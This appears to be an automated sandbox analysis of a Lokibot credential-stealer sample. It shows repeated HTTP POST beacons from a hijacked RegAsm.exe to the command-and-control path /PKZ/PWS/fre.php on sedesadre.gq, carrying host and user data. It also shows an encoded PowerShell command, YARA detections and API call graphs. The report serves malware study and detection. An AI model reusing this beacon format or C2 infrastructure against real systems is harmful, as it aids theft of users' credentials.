    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:27.313807011 CET | 2250 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:27.393636942 CET | 2250 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:27 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 3 | Source IP: 192.168.2.7 | Source Port: 49719 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:27.785438061 CET | 2251 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:27.813057899 CET | 2252 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:27.888789892 CET | 2252 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:27 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49720 | Destination IP: 141.98.6.102 | Destination Port: 80 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 16:52:28.227778912 CET | 2253 | OUT | POST /PKZ/PWS/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sedesadre.gq
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: ACA06F78
    Content-Length: 171
    Connection: close
Nov 29, 2022 16:52:28.259017944 CET | 2253 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
    Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 29, 2022 16:52:28.346106052 CET | 2253 | IN | HTTP/1.0 404 Not Found
    Date: Tue, 29 Nov 2022 15:52:28 GMT
    Server: Apache
    Status: 404 Not Found
    Content-Length: 23
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 5
Source IP: 192.168.2.7
Source Port: 49721
Destination IP: 141.98.6.102
Destination Port: 80
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: Nov 29, 2022 16:52:28.704062939 CET | kBytes transferred: 2254 | Direction: OUT | Data:
POST /PKZ/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sedesadre.gq
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: ACA06F78
Content-Length: 171
Connection: close
Timestamp: Nov 29, 2022 16:52:28.731426001 CET | kBytes transferred: 2254 | Direction: OUT | Data:
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Timestamp: Nov 29, 2022 16:52:28.798693895 CET | kBytes transferred: 2255 | Direction: IN | Data:
HTTP/1.0 404 Not Found
Date: Tue, 29 Nov 2022 15:52:28 GMT
Server: Apache
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 6
Source IP: 192.168.2.7
Source Port: 49722
Destination IP: 141.98.6.102
Destination Port: 80
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: Nov 29, 2022 16:52:29.504055977 CET | kBytes transferred: 2256 | Direction: OUT | Data:
POST /PKZ/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sedesadre.gq
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: ACA06F78
Content-Length: 171
Connection: close
Timestamp: Nov 29, 2022 16:52:29.535098076 CET | kBytes transferred: 2256 | Direction: OUT | Data:
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Timestamp: Nov 29, 2022 16:52:29.613061905 CET | kBytes transferred: 2256 | Direction: IN | Data:
HTTP/1.0 404 Not Found
Date: Tue, 29 Nov 2022 15:52:29 GMT
Server: Apache
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 7
Source IP: 192.168.2.7
Source Port: 49723
Destination IP: 141.98.6.102
Destination Port: 80
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: Nov 29, 2022 16:52:30.023507118 CET | kBytes transferred: 2257 | Direction: OUT | Data:
POST /PKZ/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sedesadre.gq
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: ACA06F78
Content-Length: 171
Connection: close
Timestamp: Nov 29, 2022 16:52:30.051918030 CET | kBytes transferred: 2257 | Direction: OUT | Data:
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Timestamp: Nov 29, 2022 16:52:30.124555111 CET | kBytes transferred: 2258 | Direction: IN | Data:
HTTP/1.0 404 Not Found
Date: Tue, 29 Nov 2022 15:52:30 GMT
Server: Apache
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 8
Source IP: 192.168.2.7
Source Port: 49724
Destination IP: 141.98.6.102
Destination Port: 80
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: Nov 29, 2022 16:52:30.488584995 CET | kBytes transferred: 2258 | Direction: OUT | Data:
POST /PKZ/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sedesadre.gq
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: ACA06F78
Content-Length: 171
Connection: close
Timestamp: Nov 29, 2022 16:52:30.515988111 CET | kBytes transferred: 2259 | Direction: OUT | Data:
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Timestamp: Nov 29, 2022 16:52:30.593492031 CET | kBytes transferred: 2259 | Direction: IN | Data:
HTTP/1.0 404 Not Found
Date: Tue, 29 Nov 2022 15:52:30 GMT
Server: Apache
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 9
Source IP: 192.168.2.7
Source Port: 49725
Destination IP: 141.98.6.102
Destination Port: 80
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp: Nov 29, 2022 16:52:30.920170069 CET | kBytes transferred: 2260 | Direction: OUT | Data:
POST /PKZ/PWS/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sedesadre.gq
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: ACA06F78
Content-Length: 171
Connection: close
Timestamp: Nov 29, 2022 16:52:30.948132038 CET | kBytes transferred: 2260 | Direction: OUT | Data:
Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Timestamp: Nov 29, 2022 16:52:31.018574953 CET | kBytes transferred: 2260 | Direction: IN | Data:
HTTP/1.0 404 Not Found
Date: Tue, 29 Nov 2022 15:52:30 GMT
Server: Apache
Status: 404 Not Found
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Target ID: 0
Start time: 16:50:23
Start date: 29/11/2022
Path: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Imagebase: 0xd60000
File size: 313856 bytes
MD5 hash: 3039FA7B347872C33C247581A27A7560
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 1
Start time: 16:50:23
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell" Get-Date
Imagebase: 0xe60000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 2
Start time: 16:50:24
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6edaf0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 5
Start time: 16:50:41
Start date: 29/11/2022
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k NetworkService -p
Imagebase: 0x7ff732630000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 12
Start time: 16:51:46
Start date: 29/11/2022
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase: 0xe60000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 13
Start time: 16:51:46
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6edaf0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 14
Start time: 16:52:22
Start date: 29/11/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase: 0x650000
File size: 64616 bytes
MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000E.00000000.513382566.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation: high


Execution Graph

Execution Coverage: 11.9%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 97
Total number of Limit Nodes: 5
(execution graph node data omitted; the API calls visible on the graph are DuplicateHandle, CreateWindowExW, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, KiUserCallbackDispatcher, LoadLibraryExW and GetModuleHandleW)

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 01765328
• GetCurrentThread.KERNEL32 ref: 01765365
• GetCurrentProcess.KERNEL32 ref: 017653A2
• GetCurrentThreadId.KERNEL32 ref: 017653FB
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 6eab50c0bc1ef9269785b83b0ec90444d41deb8bc0f39f8ed6ff3c55872249e9
• Instruction ID: 9b1f98a642d4dec6983f9f6d7d4c01fe9cfa5de2e2a81069333028bc05adabfd
• Opcode Fuzzy Hash: 6eab50c0bc1ef9269785b83b0ec90444d41deb8bc0f39f8ed6ff3c55872249e9
• Instruction Fuzzy Hash: 7E5188B09043498FDB14CFA9C5887EEFFF4EF49318F24846AE409A7260D7749844CB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 01765328
• GetCurrentThread.KERNEL32 ref: 01765365
• GetCurrentProcess.KERNEL32 ref: 017653A2
• GetCurrentThreadId.KERNEL32 ref: 017653FB
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: d304bf4ca70f92b5040122731ea7045250abccb48b1b5887d05ed00229886151
• Instruction ID: b703935fd050e19d0f715b30683016d5ca22a6bb2bccfcf333b6ea332ce10109
• Opcode Fuzzy Hash: d304bf4ca70f92b5040122731ea7045250abccb48b1b5887d05ed00229886151
• Instruction Fuzzy Hash: 2E5124B09043498FDB14CFAAD9487EEBBF4EF48318F24845AE809A7350D7749944CF69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph rendering and executed/not-executed legend omitted; the graph for the function at 176c6ea shows a call to GetModuleHandleW at 176c920)
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e512a28440c1b6509a121b5ad17acb3f4e2be16b13bee9c4a9e49dd71b18d0a
• Instruction ID: 15100cdf95d675e09f119cde31c2af49cd6205445ac333620335f80263bcb5e3
• Opcode Fuzzy Hash: 5e512a28440c1b6509a121b5ad17acb3f4e2be16b13bee9c4a9e49dd71b18d0a
• Instruction Fuzzy Hash: 55917670A00B058FD725CF69D54479ABBF5FF88214F04892ED98ADBA50DB38E806CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph rendering and executed/not-executed legend omitted; the graph for the function at 176e7ad shows the CreateWindowExW call listed below)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0176E8CA
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 23636050a7d7b28e149bb3517cc0cf2d0c43aebef4798e35e8e23abac0b3f80a
• Instruction ID: ac668c5fa7bff3f74fee2ba342ef1a93d6e9b0798b3ca3356e1c9c5dd494e49c
• Opcode Fuzzy Hash: 23636050a7d7b28e149bb3517cc0cf2d0c43aebef4798e35e8e23abac0b3f80a
• Instruction Fuzzy Hash: 3551CFB5D00349DFDB14CF99C884ADEFBB5BF88314F25812AE819AB210DB749945CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph rendering and executed/not-executed legend omitted; the graph for the function at 176e7b8 shows the CreateWindowExW call listed below)
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0176E8CA
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: 9707fa013a72f310f35f38b1b9319257a228f95652852e728459fb5333192d44
• Instruction ID: 89880f6edb452e6661892b114e429a3dbfecbca37dd5947158e4077a3f88fcac
• Opcode Fuzzy Hash: 9707fa013a72f310f35f38b1b9319257a228f95652852e728459fb5333192d44
• Instruction Fuzzy Hash: 1D41AEB5D00349DFDB14CF99C884ADEFBB5BF88314F24812AE819AB210D7749945CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

(graph rendering and executed/not-executed legend omitted; the graph for the function at 17654e8 shows the DuplicateHandle call listed below)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01765577
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 5c15bc55e387dd83f63be3d98e90f1bd073679bb4a9f7690c2706151dfd5c04c
• Instruction ID: 4b5db6e698d0728e4dc9c6c29bda2fbdded6aaff4436fda82717a78448adbfc5
• Opcode Fuzzy Hash: 5c15bc55e387dd83f63be3d98e90f1bd073679bb4a9f7690c2706151dfd5c04c
• Instruction Fuzzy Hash: 502112B5D00249DFDB10CFA9D984ADEBBF9EB48324F24841AE918B7310D374A945DF61
Uniqueness

Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 270 17654f0-1765584 DuplicateHandle 271 1765586-176558c 270->271 272 176558d-17655aa 270->272 271->272
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01765577
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0176C9B9,00000800,00000000,00000000), ref: 0176CBCA
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0176C9B9,00000800,00000000,00000000), ref: 0176CBCA
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
APIs
• KiUserCallbackDispatcher.NTDLL(0000004B), ref: 017695ED
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0176C93E
Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.517919952.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1760000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 4.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 23
Total number of Limit Nodes: 4
[rendered execution graph not reproduced]

Control-flow Graph: [rendered graph not reproduced]
APIs
• GetFileAttributesW.KERNELBASE(00000000), ref: 049312B0
Memory Dump Source
• Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_4930000_powershell.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness Score: -1.00%

Control-flow Graph: [rendered graph not reproduced]
Memory Dump Source
• Source File: 00000001.00000002.401755136.0000000004930000.00000040.00000800.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
Joe Sandbox IDA Plugin
